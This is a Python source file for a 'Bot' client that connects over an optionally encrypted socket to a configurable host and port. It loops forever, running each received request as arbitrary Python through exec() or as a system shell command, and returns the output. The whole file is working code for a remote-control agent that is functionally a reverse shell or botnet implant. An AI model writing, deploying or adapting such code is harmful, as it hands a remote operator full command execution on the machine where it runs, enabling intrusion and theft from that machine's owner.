1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
|
import contextlib
import subprocess
import argparse
import os
import io
from typing import Optional
from typing import Tuple
from shared import DEFAULT_HOSTNAME
from shared import DEFAULT_PORT
from shared import DEFAULT_ENCODING
from shared import DEFAULT_LANGUAGE_CODE
from shared import LIBERAL_ENCODING_ERRORS
from shared import Platform
from shared import AsymmetricSocket
from shared import SymmetricSocket
from shared import Socket
class Execute:
    """Run Python snippets and shell commands and return their text output."""

    # Encoding used to decode the shell command's stdout/stderr.
    ENCODING = DEFAULT_ENCODING
    # Code page passed to ``chcp`` before a shell command when
    # ``Platform.WINDOWS`` is truthy; a falsy value skips that step.
    LANGUAGE_CODE = DEFAULT_LANGUAGE_CODE
    # Maximum number of seconds a shell command may run.
    TIMEOUT = 60

    @staticmethod
    def code(code: str) -> str:
        """Execute Python source and return everything it printed to stdout.

        Args:
            code: Python source text to execute.

        Returns:
            The text written to stdout while the snippet ran.

        Raises:
            AssertionError: If ``code`` is not a ``str``.
            Exception: Whatever the snippet itself raises propagates unchanged.
        """
        assert isinstance(code, str), f'Wrong type: {code=}'
        # SECURITY: exec() runs arbitrary code with this process's privileges.
        # Only feed it input from a trusted, authenticated peer.
        #
        # Run the snippet in ONE namespace (a copy of this module's globals).
        # A bare exec(code) inside a function uses separate globals and
        # locals, so functions defined by the snippet cannot see the snippet's
        # own top-level names or imports and fail with NameError.
        namespace = dict(globals())
        buffer = io.StringIO()
        with contextlib.redirect_stdout(buffer):
            exec(code, namespace)
        return buffer.getvalue()

    @staticmethod
    def shell(command: str) -> str:
        """Run ``command`` through the system shell and return its output.

        Newlines in ``command`` are turned into `` && `` so that each line
        only runs when the previous one succeeded.

        Args:
            command: Shell command text, possibly spanning several lines.

        Returns:
            stdout followed by stderr with trailing whitespace removed, or a
            ``'[BOT] ERROR :: ...'`` message when the command runs longer
            than ``Execute.TIMEOUT`` seconds.
        """
        command = command.strip().replace('\n', ' && ')
        if Platform.WINDOWS and Execute.LANGUAGE_CODE:
            # Select the console code page first so the output can be decoded.
            command = f'chcp {Execute.LANGUAGE_CODE} > nul && {command}'
        try:
            # subprocess.run() kills AND reaps the child on timeout, so no
            # zombie process or open pipe is left behind.
            completed = subprocess.run(
                command,
                shell=True,
                stdin=subprocess.DEVNULL,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                encoding=Execute.ENCODING,
                errors=LIBERAL_ENCODING_ERRORS,
                timeout=Execute.TIMEOUT,
            )
        except subprocess.TimeoutExpired as err:
            return f'[BOT] ERROR :: {err}'
        return (completed.stdout + completed.stderr).rstrip()
class Bot:
    """Serve requests received over a socket wrapper and reply with results."""

    def __init__(
        self,
        *args,
        symmetric: Optional[bool] = None,
        **kwargs
    ) -> None:
        """Create the socket wrapper and prepare it for use.

        Args:
            *args: Positional arguments forwarded to the socket class.
            symmetric: ``None`` selects ``Socket``, ``True`` selects
                ``SymmetricSocket`` and ``False`` selects ``AsymmetricSocket``.
            **kwargs: Keyword arguments forwarded to ``SymmetricSocket`` or
                ``AsymmetricSocket``; they are not passed to ``Socket``.

        Raises:
            AssertionError: If ``symmetric`` is neither a ``bool`` nor ``None``.
        """
        assert isinstance(symmetric, bool) or symmetric is None, f'Wrong type: {symmetric=}'
        if symmetric is None:
            self.bot = Socket(*args)
        elif symmetric:
            self.bot = SymmetricSocket(*args, **kwargs)
        else:
            self.bot = AsymmetricSocket(*args, **kwargs)
        # Same two setup calls for every socket flavour.
        # NOTE(review): presumably these open the connection and install the
        # encryption layer -- confirm against the `shared` module.
        self.bot.set_conn()
        self.bot.set_middleware()

    @staticmethod
    def _cd_target(command) -> Optional[str]:
        """Return the directory named by a ``cd`` command, else ``None``."""
        if command[:2] != 'cd':
            return None
        rest = command[2:]
        # 'cdk deploy' or 'cdrecord' are other programs, not 'cd'. Forms such
        # as 'cd..', 'cd\' and 'cd/' stay accepted.
        if rest and (rest[0].isalnum() or rest[0] in '_-'):
            return None
        return rest.lstrip()

    def connect(self) -> None:
        """Receive requests forever and answer each one.

        Each request is read with ``.get`` for the keys ``'request'`` (the
        command text) and ``'run'`` (a ``bool``). When ``run`` is true the
        command is executed as Python code. Otherwise a ``cd`` command changes
        this process's working directory and anything else goes to the shell.
        The reply is ``{'response': ...}``; any failure while handling a
        request is reported as ``'[BOT] ERROR :: ...'`` and the loop goes on.
        """
        while True:
            request = self.bot.recv()
            try:
                command, run = request.get('request'), request.get('run')
                # Explicit raises instead of assert: the request comes from
                # the network and the checks must survive `python -O`.
                if command is None:
                    raise ValueError(f'Missing attribute: {command=}')
                if not isinstance(run, bool):
                    raise TypeError(f'Wrong type: {run=}')
                if run:
                    response = Execute.code(command)
                else:
                    target = self._cd_target(command)
                    if target is None:
                        response = Execute.shell(command)
                    else:
                        # A 'cd' inside a subprocess would not outlive it, so
                        # change this process's own directory instead.
                        os.chdir(target)
                        response = os.getcwd()
                self.bot.send({'response': response})
            except Exception as err:
                self.bot.send({'response': f'[BOT] ERROR :: {err}'})
if __name__ == '__main__':
    # Command-line entry point: parse the connection settings, pick the
    # socket flavour from the credentials supplied, then serve forever.
    parser = argparse.ArgumentParser()
    parser.add_argument('--hostname', default=DEFAULT_HOSTNAME)
    parser.add_argument('--port', default=DEFAULT_PORT, type=int)
    for flag in ('--password', '--salt', '--pubk_data'):
        parser.add_argument(flag)
    args = parser.parse_args()

    # Password and salt together select the symmetric socket, a public key
    # selects the asymmetric one, and anything else uses the plain socket.
    options = {}
    if args.password and args.salt:
        options.update(symmetric=True, password=args.password, salt=args.salt)
    elif args.pubk_data:
        options.update(symmetric=False, public_key_data=args.pubk_data)

    bot = Bot(args.hostname, args.port, **options)
    bot.connect()
|